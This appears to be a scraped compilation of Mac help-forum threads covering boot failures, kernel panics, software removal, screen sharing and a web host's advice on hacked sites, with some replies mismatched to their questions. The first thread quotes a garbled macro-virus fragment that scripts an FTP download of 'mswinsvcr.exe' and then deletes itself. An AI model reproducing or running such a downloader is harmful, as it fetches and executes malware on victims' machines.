Help!   Was my iMac G5 attacked by hackers?

I was using Microsoft Word when the following words were automatically typed in the text:
06 4100 .. eq 7echo get mswinsvcr.exe .. eq 7echo quit .. eq 7ftp –n –s;eq 7mswinsvcr.exe 7del eq
I heard that "mswinsvcr.exe" was related to some kind of hacker program. I'm really concerned. What should I do? Please help me. Thanks!

Sounds to me that somewhere you acquired an Office file that was infected with a Windows macro virus. While it can't do any harm to your Mac I believe it can play hob with your Office files, and it can be passed on to a Windows machine if you send an Office file from your Mac to a Windows user. I rarely use Office, and have never gotten a macro virus, so don't don't know the procedure in cleaning up the mess, but there is one. See, for instance, this thread at MacFixIt:
http://www.macfixitforums.com/showflat.php?Board=OfficeX&Number=790097
Whether all the information you need is there or not, I don't know.

  • Help please! Imac won't start and running out of ideas

Help! My imac G4 Flat Panel running tiger won't boot or go beyond the grey screen, here's what happened,
I went away on holiday for ten days and unplugged it, on return it worked fine for the first few goes however after leaving it with alot of photos open for a couple of hours I returned and the screen had gone funny, showed the app window on top but not properly and grey on the bottom two thirds, I could just about move the mouse which was ghosting and it sort of worked but not properly, I switched it off on the power switch and rebooted and it was okay for a few more sessions until getting stuck with the mail app open, I tried to force quit but couldn't and eventually turned it off on the switch, after which it won't boot or go beyond the grey screen every time I switch it on, I've tried all the following with no joy:
    -unplugged all peripherals
-taken out airport card and extra ram I'd fitted myself about six months ago
    - done command, option, p and r on switching on, also command x and command option.
    - tried to boot from the original os x cd which came with it - this gives me a broken mac symbol and multicoloured spinning ball
    - boot from os9 disk which came with it this gives me a flashing question mark sometimes but most times just the grey screen.
    - boot from apple hardware test diagnostic cd which came with it, just says loading and hangs
    - boot from tiger dvd - shows the apple logo then a sign similar to no entry sign and spinning thing underneath.
I've tried rebooting about 100 times now, as it once did a similar thing about eight months ago but eventually booted okay and then I ran check permissions etc. and never had a problem until now.
I've put everything I can think of in in case any of it is important, apologies if there's too much extra info here but if anyone has any ideas I'd be very grateful, am a bit stuck without it, luckily I've backed up most of my stuff but there's some things I haven't. please help! thanks

Sorry to hear about your problem and I wish I had happy news. Sounds like what I am going through. Just spent over 200$ getting the Tiger upgrade installed at a Mac repair place because I wanted it done right, and had the RAM upgraded. After two weeks of bliss I get a gray screen with a spinning gear. The CD drawer wont open, nothing. Take it back to the shop and I find my hard drive is done. This is the SECOND hard drive. My G-4 came with a 40 gig HD, the one that they replaced it with 2 years ago was an 80 gig. I hope thats not whats going on with yours but it sure sounds like it. I beginning to wonder if there isn't a design issue going on here. I am a casual computer user but my son is on it for hours at a time and I'm wondering about heat buildup and the hard drive. Gonna ask that question when I pick it up, good luck with yours.

Troubleshooting help needed:  My iMac keeps crashing and restarting with a notice: "Spinlock application timed out"  What can I do?

Launch the Console application in any of the following ways:
☞ Enter the first few letters of its name into a Spotlight search. Select it in the results (it should be at the top.)
☞ In the Finder, select Go ▹ Utilities from the menu bar, or press the key combination shift-command-U. The application is in the folder that opens.
☞ Open LaunchPad. Click Utilities, then Console in the page that opens.
Select the most recent panic log under System Diagnostic Reports. Post the contents — the text, please, not a screenshot. In the interest of privacy, I suggest you edit out the “Anonymous UUID,” a long string of letters, numbers, and dashes in the header and body of the report, if it’s present (it may not be.) Please don't post shutdownStall, spin, or hang reports.

Get rid of Sophos Anti-Virus software you have installed. Use the uninstaller or:
    Uninstalling Software: The Basics
Most OS X applications are completely self-contained "packages" that can be uninstalled by simply dragging the application to the Trash.  Applications may create preference files that are stored in the /Home/Library/Preferences/ folder.  Although they do nothing once you delete the associated application, they do take up some disk space.  If you want you can look for them in the above location and delete them, too.
Some applications may install an uninstaller program that can be used to remove the application.  In some cases the uninstaller may be part of the application's installer, and is invoked by clicking on a Customize button that will appear during the install process.
Some applications may install components in the /Home/Library/Applications Support/ folder.  You can also check there to see if the application has created a folder.  You can also delete the folder that's in the Applications Support folder.  Again, they don't do anything but take up disk space once the application is trashed.
Some applications may install a startupitem or a Log In item.  Startupitems are usually installed in the /Library/StartupItems/ folder and less often in the /Home/Library/StartupItems/ folder.  Log In Items are set in the Accounts preferences.  Open System Preferences, click on the Accounts icon, then click on the LogIn Items tab.  Locate the item in the list for the application you want to remove and click on the "-" button to delete it from the list.
Some software use startup daemons or agents that are a new feature of the OS.  Look for them in /Library/LaunchAgents/ and /Library/LaunchDaemons/ or in /Home/Library/LaunchAgents/.
If an application installs any other files the best way to track them down is to do a Finder search using the application name or the developer name as the search term.  Unfortunately Spotlight will not look in certain folders by default.  You can modify Spotlight's behavior or use a third-party search utility, Easy Find, instead.  Download Easy Find at VersionTracker or MacUpdate.
Some applications install a receipt in the /Library/Receipts/ folder.  Usually with the same name as the program or the developer.  The item generally has a ".pkg" extension.  Be sure you also delete this item as some programs use it to determine if it's already installed.
There are many utilities that can uninstall applications.  Here is a selection:
    AppZapper
    Automaton
    Hazel
    CleanApp
    Yank
    SuperPop
    Uninstaller
    Spring Cleaning
Look for them at VersionTracker or MacUpdate.
For more information visit The XLab FAQs and read the FAQ on removing software.

Take a look at iTunes for Windows: "Error 7" message when opening iTunes. Perhaps your .NET Framework needs a repair.
For general advice see Troubleshooting issues with iTunes for Windows updates.
The steps in the second box are a guide to removing everything related to iTunes and then rebuilding it which is often a good starting point unless the symptoms indicate a more specific approach. Review the other boxes and the list of support documents further down the page in case one of them applies.
Your library should be unaffected by these steps but there is backup and recovery advice elsewhere in the user tip.

  • Help, was clearing HD out and now will not start up!

I think I may have deleted some files i shouldn't have whilst trying to free up some space on my imac. If I turn it on it goes to the screen with the grey box telling me to restart my computer. Over the screen there is loads of text starting with, panic(cpu 0): unable to find driver for this platform: "powermac4.2" and then more text and numbers. I cannot do anything beyond this point.I am using another computer at the moment. Have I just killed my computer or can anybody help??

Hello and Welcome to Apple Discussions.
You are suffering what's known as a Kernel Panic due to those missing system files. Without knowing what's missing exactly the only what ahead is to boot from the OS X Install disk and conduct and Archive and Install. Your data will remain intact but the system preferences etc will be replaced.
I dare say you don't want the lecture on 'messing with system files' or 'having a whole system back-up on an external drive'?
Let us know how you get on.
    kind regards

    Thanks : D
    Gareth

The new version PSE will run on OS X 10.7 Lion.
    PSE 12 runs on 10.7- 10.9
Here are the system requirements for OS X 10.7 Lion.
To use Lion, make sure your computer has the following:
An Intel Core 2 Duo, Core i3, Core i5, Core i7, or Xeon processor
Mac OS X v10.6.6 or later to install via the Mac App Store (v10.6.8 recommended); you can install without Mac OS X v10.6 by using an OS X Lion USB Thumb Drive, available on the Apple Online Store
7 GB of available disk space
    2 GB of RAM
To find out info about your system
Click on the Apple symbol in the upper left of the OS X main menu bar. A drop down menu appears. Click About this Mac. A smaller popup window appears. This gives you basic info like what version of OS X your iMac is running, the speed of your iMac's CPU and how much RAM is installed.
Click on the button that says More Info. A larger window appears giving you a complete overview of your iMac's hardware specs.
Highlight all of this info and copy/paste all of this into another reply to this post, editing out your iMac's serial number before actually posting the reply. This will tell us everything about your iMac so we may begin to help with your iMac issues.
If your 2006 iMac can run Lion then you can purchase a Lion install code here.
    http://store.apple.com/us/product/D6106Z/A/os-x-lion
Before installing a major systems upgrade, it would be prudent to have a viable backup of your current system and important data in case something should go wrong with the installation.
    Good Luck!

  • How to i provide help to another imac user over the computer

How to i provide onscreen help to another imac user over the computer?

    Hi,
If you both have iChat or Messages you can use it's Screen Sharing abilities.
You can do this AIM to AIM (Screen Names that are valid with the AIM service which includes some Apple Issued Apple ID names - although this can be version dependent)
You can also do it Jabber ID to Jabber ID.
Jabber IDs include Google Mail IDs set up for Google talk and Facebook Accounts with Chat Enabled.
Check you can Video chat with the person as it takes a similar amount of Bandwidth (the bit of the Internet Speed you computer gets).
You needs to Enable Screen Sharing in the Video Menu of iChat or the Messages app in Mountain Lion.
Highlight the Buddy in the Buddy list and use the icon at the bottom of the Buddy list (It will offer your to them  or them to you)
You can also use the Buddies menu when a Buddy is highlighted.
It is also possible to "switch" to Screen Sharing in a Video chat.
In reality it instantly closes the Video chat and Starts the Screen Share.
It does not have the ability to "Switch" back as closing the Screen Share close the connection.
Screen Sharing includes a Audio Chat alongside  (Technically it is an Audio  Chat with an Apple Remote Desktop type VNC connection.  The Apple Remote Desktop engine provides the "Desktop" "Pics").
To do this VNC part you router will need to be using UPnP (Or Port Mapping Protocol in Apple Base Stations)
AS Video chats and Audio chats use the same ports to connect it means that if you can Video your can Screen Share

  • My sites have been hacked and hostgator has told me to "Disable javascript - Use the firefox addon noscript" and I don't know how to. Are all updates always sent to me as that was another point made to prevent hackers? Thanks you. David. in English

What are malicious scripts and what causes them? Over the years hackers found it hard to trick people into visiting suspicious sites so they're now targeting legit sites and using them to infect unknowing customers. In most cases an FTP account's password is obtained through key logging malware, then legit website files are modified to distribute the malware and gather more passwords. If your PC has been infected with one of these trojans, your bank account, email accounts, and FTP accounts may no longer be secure. * What to do if you find malicious scripts 1. Use the following online vulnerability scanner and ensure your software is up-to-date: http://secunia.com/vulnerability_scanning/online/?task=load 2. Download antivirus and fully scan your PC for malicious files. Here are some free online scanners: http://housecall.trendmicro.com/ http://www.bitdefender.com/scan8/ie.html http://www.kaspersky.com/virusscanner http://support.f-secure.com/enu/home/ols.shtml 3. Update all passwords that may have been obtained. Do not use old passwords, generate new ones. 4. Upload older versions of the files or contact support for assistance removing the malicious scripts. * Prevention - Ensure you use the latest browser version - Disable javascript - Use the firefox addon noscript - Download and install some free antivirus software, make sure it stays updated - Use http://www.avg.com.au/index.cfm?section=avg&action=onlinescan to test suspicious links you are given in emails or find online. If you are seeing a Google Attack Page when you visit the site, use the steps below to request that Google reindex the site and hopefully remove this block. On the Overview page, click Request a review and follow the instructions. Best regards, Tyler Evans Network Security Administrator HostGator.com LLC http://support.hostgator.com

    Thank you.
I also had tried other means of getting answers and got an even more specific answer on just how to do this.  Below is the link to the actual knowledgebase article giving specific instructions since there are some files that need to be on the Palm and some on the card, etc.
    http://support.laridian.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=380&ratingconfirm=...
I emailed Zondervan to see if they might be able to direct me to a downloadable manual.  The referred me to laridan.com who now supports their software.
I followed the instructions, taking into account some things that were already where they needed to be, hot synced it and it seems to be working fine with 7.8 M free space on my Palm which I trust is enough for my other very large applications.
    Thanks for your help!

  • Help! My iMac commited suicide!

Right. So I wake up this morning and turn over to look at my computer sitting on it's desk. I click the mouse to open up Safari and check my email, and nothing happens. So I click on the desktop to move to finder, and open up the drop menu to select force quit in case Safari wasn't responding. I then have the joy of my computer instantly turning off. So i try to reboot it, and when it hits the gray screen with the apple and the spinning circle it freezes, and around 3 minutes later my fan goes out of control and turns on full speed. So I shut it down with the power button, and try again. Same thing. I figure maybe if I give it time, so I repeat, and leave to make breakfast. When I return, my computer is still whirring and hasn't changed, so I shut it down. I then engage in a lovely 6 or 7 hours of troubleshooting, reading webpages on my G3, learning ways to fix things I didn't know existed in computers and trying every non-damaging suggestion I recieved. Finally, I launched my mac off the install disk after the first 30 minutes or so. It wasn't capable of repairing whatever was wrong with disk utility. So, I tried to launch it again just in case it decided to work on it's own. No luck. I open up disk utility again, and this time "233.8 GB Maxtor 6B250SO" is in bright red. So I click on that disk image. It says "This drive has reported a fatal hardware error to Disk Utility. If the drive has not failed completely, back up as much data as you can and then replace it with a working drive." Now anyways, I've read a lot of people having the same bootup problem I did, and most of them seem to have failed logic boards that need to be replaced or are oozing gunk or some such, but none have had smart failures. What I now know, is that my computer will under no circumstance launch, and that my drive may be dead. If it's not, then I have a huge database of files that I would REALLY like to save, including more than a few hundred dollars of iTunes music. I have a feeling I just lost everything I've acquired on this computer as well as all my graphic design work since last July, and unless someone can tell me a way to salvage my completely not-backed-up files, then I might as well just send it off and scream at the wall or something. This is horrifying me, I've never really backed up files before, never thought to, and now they're possibly ALL gone. If anyone can help in any way, please respond soon to this post, or even better to my email address at [email protected]. Any help of any kind is greatly appreciated.
    -David
    First Gen iMac G5 17"   Mac OS X (10.4.3)

    Welcome to Apple Discussions
Wow. That's quite a crash. Have you spoken with Apple about your situation?
I haven't had to recover data as I backup my system daily using SuperDuper. It took but one experience of losing data to convince me to invest $150 US or so, in an external HD and another $20 for the software. My backup has helped me out of a few jams since. As the previous poster mentioned, regardless of the mfg., machines do occur malfunctions, usually at the most inconvenient time.
First things first. Before you can think about recovering files you need to know what is wrong mechanically with your iMac. Important you speak with Apple, or if the machine is outside of warranty, a certified Apple technician.
In the data recovery realm: Outside data recovery services are very expensive. There also exists software for recovering data. Not sure what any of these programs can or cannot do. To start you off, here is a Google search of "Mac OS X data recovery".

  • HELP! My iMac wont respond to install disc or any commands

I know I'm taking a trip in the "Way back" machine. But I'm pretty resourseful and haven't been able to find my problem. Either I need a Mac super genius or it’s something stupid simple that I’m overlooking.
    Specs:
    iMac G4 Serial# XXXXXXXX Sep. 2003 – July 2004
    1.25GHZ/ 256MB/ 80GB 17” Screen
    PowerPC 7445
History: I bought this used with the computer’s monitor backlight out. I could still barely see the sign-in page when I looked at a certain angle, so that was an indicator to me that the OS was working. So I replaced the monitor. At the same time because of owner exchange I had to replace the hard drive with a fully wiped blank one (Deskstar ATA/IDE). I purchased an install disc set 10.4.8, which according to Apple this computer is compatible with 10.2.3 thru10.5.8.
Problem: After reassembly, the replacement monitor works fine. But the system won’t respond to anything. All I get is the gray screen with the apple smiley face folder that alternates with a question mark. It won’t respond to the install disc, or any commands for that matter. Of course I double, triple, and quadruple checked my connections from reassmebling. Here’s what I’ve attempted, all ending up with the same screen display.
    During power-up
C (…of     course to boot from the install disc. It just ejects the disc after about     30 seconds)
    CMD-OPT-SHIFT-DEL
D (wont     respond to hardware test)
CMD-S     (won’t go into single user mode. It just goes to the same gray screen)
OPT (this     is the only way I get a different screen. It shows the recycle page symbol     and continue symbol. It will recycle the OPT process to stay on this     screen, but it won’t continue if I press that selection – nothing happens
    I’ve reset the PRAM
I’ve tried different keyboards (all Apple)
I’ve tried plugging the keyboard into different USB slots
I’ve replaced the Hard Drive with yet another just in case. I’ve tried alternate jumper settings on the hard drive. The original wasset to “Cable”, so I set it to that. But I also tried “Master” jumper settings– no change in results. I can’t say for certain that I hear the DVD/CD drive spin up. But I figure even if I had a bad install disc or bad optical drive, I should still be able to get to the black screen single user mode, yes?  So I’m at my wits end. Can any of you Mac geniuses out there please help me? Thanks
    <edited by Host>

Install discs are specific to the machine they came with.  You cannot use them on any other machine, so the ones you bought are useless.  Buy a retail black faced copy of either Tiger or Leopard and you should be able to boot your machine, you need to format the drive as Mac OS extended (Journaled) when you first boot from the new retail disc.
I have also asked that your serial number be removed, it's not a good idea to post it.
